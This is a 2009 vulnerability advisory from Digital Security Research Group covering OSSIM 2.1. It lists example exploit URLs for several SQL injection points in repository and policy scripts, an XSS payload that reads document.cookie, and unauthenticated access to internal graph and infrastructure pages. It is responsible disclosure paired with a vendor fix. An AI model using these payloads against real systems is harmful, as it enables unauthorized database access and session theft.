OSSIM - Open Source Security Information Management is vulnerable to multiple security vulnerabilities.
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-055
Application: OSSIM
Versions Affected: 2.1 and may be 2.1.1
Vendor URL: http://ossim.net/
Bug: SQL Injection,XSS, Unauthorized access
Exploits: YES
Reported: 07.09.2009
Vendor response: 09.09.2009
Solution: YES (version 2.1.2)
Date of Public Advisory:21.09.2009
Author: Sintsov Alexey of Digital Security Research Group [DSecRG]
Details
1.1 SQL injections in repository
Attacker need to be authorized in system for success.
Vulnerable script - repository_document.php
Vulnerable parameter - id_document
Example
http://OSSIM-SERVER/ossim/repository/repository_document.php?id_document=-3
union select 1,2,user(),4,5,6–&maximized=1&search_bylink=&pag=1
1.2 SQL injections in repository
Attacker need to be authorized in system for success.
Vulnerable script - repository_links.php
Vulnerable parameter - id_document
Example
http://OSSIM-SERVER/ossim/repository/repository_links.php?id_document=-3
union select 1,user(),3,4,5,6
1.3 SQL injections in repository
Attacker need to be authorized in system for success.
Vulnerable script - repository_editdocument.php
Vulnerable parameter - id_document
Example
http://OSSIM-SERVER/ossim/repository/repository_editdocument.php?id_document=-3
union select 1,user(),3,4,5,6
1.4 SQL injection in policy scripts
Attacker need to be authorized in system for success.
Vulnerable script - getpolicy.php
Vulnerable parameter - group
Example
http://OSSIM-SERVER/ossim/policy/getpolicy.php?group=0 and 1=1
1.5 SQL injection in policy scripts
Attacker need to be authorized in system for success.
Vulnerable script - newhostgroupform.php
Vulnerable parameter - name
Example
http://OSSIM-SERVER/ossim/host/newhostgroupform.php?name=' union select
user(),'b','c','d','f
1.6 SQL injection in policy scripts
Attacker need to be authorized in system for success.
Vulnerable script - modifynetform.php
Vulnerable parameter - name
Example
http://OSSIM-SERVER/ossim/net/modifynetform.php?name=' union select
user(),'b','c','d','e','f','g','h','a
And others scripts in policy menu.
Vulnerable script /ossim/
Vulnerable parameter - option
Example
http://OSSIM-SERVER/ossim/?option=0" onload=alert(document.cookie) a="
Unauthorized user can see graphs and infrastructure
Example
Access to the graph:
http://OSSIM-SERVER/ossim/graphs/alarms_events.php
Internal infrastructure view:
http://OSSIM-SERVER/ossim/host/draw_tree.php
Fix Information
Upgrade to version 2.1.2
About
Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and
penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS
standards. Digital Security Research Group focuses on web application and database security problems with vulnerability
reports, advisories and whitepapers posted regularly on our website.
Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com